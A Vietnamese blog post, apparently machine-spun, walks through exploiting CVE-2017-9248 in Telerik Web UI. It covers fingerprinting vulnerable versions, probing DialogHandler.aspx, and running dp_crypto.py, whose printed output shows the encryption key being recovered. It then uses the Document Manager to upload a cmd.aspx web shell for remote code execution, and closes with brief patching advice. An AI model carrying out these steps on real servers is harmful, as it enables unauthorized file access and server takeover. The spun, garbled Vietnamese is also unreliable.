Telerik là gì

     
Chào phần đa người, bản thân xin share bài viết đối chiếu về lỗ hổng trên Telerik Web UI, Tuy cũ nhưng mà bắt đầu, cũ bởi vì nó là CVE 2017-9248 , mới bởi bản thân vô tình phạt hiện tại rằng nó không có sẵn vào signature các vật dụng ANTT, và nó tương đối cực nhọc vào câu hỏi phạt hiện nay tự động hóa bởi vì nó thực hiện request một phương pháp thích hợp lệ, bởi vậy mình khuyến nghị các bạn từ chất vấn lắp thêm ANTT thống trị cùng cập nhật. Đây là lỗ hổng bảo mật thông tin rất là nghiêm trọng, trường tồn vì mã hóa yếu vào tệp tin Telerik.Web.UI.dll (Telerik UI for ASPhường.NET AJAX components). Knhì thác lỗ hổng này hacker hoàn toàn có thể lời giải ra key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey), từ bỏ đó đã đạt được con đường link quản trị câu chữ tệp tin và hoàn toàn có thể sở hữu tệp tin lên sever nếu cấu hình được cho phép (mặc định là đến phép). Lỗ hổng này mãi sau sống các phiên bạn dạng từ 2012.3.1308 mang lại 2017.1.118 (.NET 35, 40, 45).


Bạn đang xem: Telerik là gì

*

Cách khẳng định lỗ hổng:

*

Mở source web bằng cách Kích buộc phải View page source tốt Ctrl+U sau đó bấm Ctrl +F search với tự khóa “Telerik.Web.UI”
*

OK tiếp nối có thể lướt source tại một vài trang con khác để tìm phiên bạn dạng hiện nay
*

Quý khách hàng sẽ tìm thấy với định hình như hình bên trên OK, và dưới là list các phiên bản rất có thể bị khai quật 2013.1.2trăng tròn =>2017.2.503Time lớn Exploit



Xem thêm:

*

Trước Khi triển khai exploit, chúng ta xác minh được tập tin “Dialog Handler” bằng phương pháp request https://www.example.com/Telerik.Web.UI.DialogHandler.aspx, nếu kết quả các bạn thừa nhận lại được là chuỗi “Loading the dialog…” thì boom chúng ta đã đi được đúng phía.
*

Sugib3o~# pynhỏ nhắn dp_crypto.py -k http://www.example.com/Telerik.Web.UI.DialogHandler.aspx 48 hex 9dp_cryplớn by Paul Taylor / Foregenix LtdCVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromiseAttacking http://www.example.com/Telerik.Web.UI.DialogHandler.aspxto lớn find key of length <48> with accuracy threshold <9>using key charmix <01234567890ABCDEF>Key position 01: D found with 31 requests, total so far: 31Key position 02: 3 found with 10 requests, total so far: 41Key position 03: A found with 35 requests, total so far: 76Key position 04: D found with 46 requests, total so far: 122Key position 45: B found with 50 requests, total so far: 1638Key position 46: 3 found with 36 requests, total so far: 1674Key position 47: 3 found with 50 requests, total so far: 1724Key position 48: F found with 57 requests, total so far: 1781Found key: D3ADB33FTotal web requests: 17812014.3.1024: http://www.example.com/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=
Sau kia truy vấn cho con đường link “Document Manager” nhằm truy cập được toàn thể tập tin cùng thư mục của Server nạn nhân mặt khác rất có thể thực hiện upload tập tin lên Server này
*
*

Mình vừa upload 1 tập tin cmd.aspx
*
Tập tin đang lên máy chủ. Now it's time to lớn RCE
*
Thực hiện tại request cùng truyền 1 vài ba tđam mê số từ bên phía ngoài
*

Tiến hành tăng cấp phiên bản vá theo phía dẫn tại đâyTạo các khóa nhất mang đến Telerick.Web.UI.DialogParameterEncodingKey với MachineKey vào website.config hoặc dùng trình sản xuất khóa của IIS machine KeyThực hiện Redirect url trả lại trang thông tin lỗi khi hacker truy cập Telerik

Chuyên mục: Công nghệ tài chính